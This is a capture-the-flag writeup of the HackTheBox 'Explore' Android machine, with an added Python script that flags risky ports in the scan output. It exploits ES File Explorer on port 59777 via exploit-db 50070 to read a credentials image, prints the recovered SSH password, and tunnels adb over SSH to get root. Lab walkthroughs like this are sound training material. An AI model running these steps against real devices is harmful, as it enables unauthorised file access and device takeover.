HackTheBox: Explore Writeups
Nov 11, 2021
Initial Foothold
As usual, I started with network scanning using nmap.
sudo nmap -p- -A 10.10.10.247
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
2222/tcp open ssh (protocol 2.0)
| fingerprint-strings:
| NULL:
|_ SSH-2.0-SSH Server - Banana Studio
| ssh-hostkey:
|_ 2048 71:90:e3:a7:c9:5d:83:66:34:88:3d:eb:b4:c7:88:fb (RSA)
5555/tcp filtered freeciv
42135/tcp open http ES File Explorer Name Response httpd
|_http-server-header: ES Name Response Server
|_http-title: Site doesn't have a title (text/html).
42855/tcp open unknown
| fingerprint-strings:
| GenericLines:
| HTTP/1.0 400 Bad Request
| Date: Sun, 22 Aug 2021 09:57:34 GMT
| Content-Length: 22
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Invalid request line:
| GetRequest:
| HTTP/1.1 412 Precondition Failed
| Date: Sun, 22 Aug 2021 09:57:34 GMT
| Content-Length: 0
| HTTPOptions:
| HTTP/1.0 501 Not Implemented
| Date: Sun, 22 Aug 2021 09:57:40 GMT
| Content-Length: 29
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Method not supported: OPTIONS
| Help:
| HTTP/1.0 400 Bad Request
| Date: Sun, 22 Aug 2021 09:57:57 GMT
| Content-Length: 26
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Invalid request line: HELP
| RTSPRequest:
| HTTP/1.0 400 Bad Request
| Date: Sun, 22 Aug 2021 09:57:40 GMT
| Content-Length: 39
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| valid protocol version: RTSP/1.0
| SSLSessionReq:
| HTTP/1.0 400 Bad Request
| Date: Sun, 22 Aug 2021 09:57:57 GMT
| Content-Length: 73
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Invalid request line:
| ?G???,???`~?
| ??{????w????<=?o?
| TLSSessionReq:
| HTTP/1.0 400 Bad Request
| Date: Sun, 22 Aug 2021 09:57:58 GMT
| Content-Length: 71
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Invalid request line:
| ??random1random2random3random4
| TerminalServerCookie:
| HTTP/1.0 400 Bad Request
| Date: Sun, 22 Aug 2021 09:57:58 GMT
| Content-Length: 54
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Invalid request line:
|_ Cookie: mstshash=nmap
59777/tcp open http Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older
Network Distance: 2 hops
TRACEROUTE (using port 256/tcp)
HOP RTT ADDRESS
1 300.71 ms 10.10.14.1
2 301.27 ms 10.10.10.247
Port 59777 has a known vulnerability, and the exploit is also available on exploit-db:
https://www.exploit-db.com/exploits/50070
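Note that nmap's version guess for 59777 ("Bukkit JSONAPI httpd") is wrong here; the service is the ES File Explorer HTTP server. The following is an added example (not from the original post) that parses the port table of the scan above and flags the services a defender would want to inventory on an Android host: the adb port and the ES File Explorer listeners. The sample scan text and the RISKY table are constructed for this example.

```python
import re

# Sample port lines, constructed from the nmap -p- -A output above
SCAN = """\
2222/tcp  open     ssh     (protocol 2.0)
5555/tcp  filtered freeciv
42135/tcp open     http    ES File Explorer Name Response httpd
42855/tcp open     unknown
59777/tcp open     http    Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older
"""

# port/proto  state  service  [version...]
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")

# Ports whose exposure matters regardless of nmap's service label (assumed local policy)
RISKY = {
    5555: "Android Debug Bridge (adb): a reachable adb daemon hands out a shell",
    59777: "ES File Explorer HTTP server: serves device files to the LAN (exploit-db 50070)",
}

def parse_nmap(text):
    """Return one dict per 'NNN/tcp state service version' line; nmap script
    output lines (starting with '|') do not match the pattern and are skipped."""
    rows = []
    for line in text.splitlines():
        m = PORT_RE.match(line.strip())
        if m:
            rows.append({"port": int(m.group(1)), "proto": m.group(2),
                         "state": m.group(3), "service": m.group(4),
                         "version": m.group(5) or ""})
    return rows

def flag_risky(rows):
    """Flag by port number first, because nmap's fingerprint for 59777 is a
    misidentification; then flag anything whose banner names ES File Explorer."""
    findings = []
    for r in rows:
        if r["port"] in RISKY:
            findings.append((r["port"], r["state"], RISKY[r["port"]]))
        elif "ES File Explorer" in r["version"] or "ES Name Response" in r["version"]:
            findings.append((r["port"], r["state"],
                             "ES File Explorer name-response service: app is installed and listening"))
    return findings

if __name__ == "__main__":
    for port, state, why in flag_risky(parse_nmap(SCAN)):
        print(f"{port:>5} {state:<8} {why}")
```

A filtered 5555 still appears in the findings: the writeup shows that adb becomes reachable once a tunnel to localhost exists, so the port is worth recording even when it is not open from the outside.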
Exploiting User
Using the listPics command, we got an interesting file.
We can read that interesting file using the getFile command:
python 50070.py getFile explore.htb /storage/emulated/0/DCIM/creds.jpg
user : kristi
pass : Kr1sT!5h@Rp3xPl0r3!
We can use the previous credentials to log in with SSH.
The user flag is located at /sdcard/user.txt
Privilege Escalation
Following that article, since adb can only be accessed from localhost, we must do port forwarding:
ssh kristi@explore.htb -L 5555:127.0.0.1:5555 -p 2222
# on another terminal
adb connect localhost:5555
adb -s localhost:5555 shell
su
The root flag is located at /data/root.txt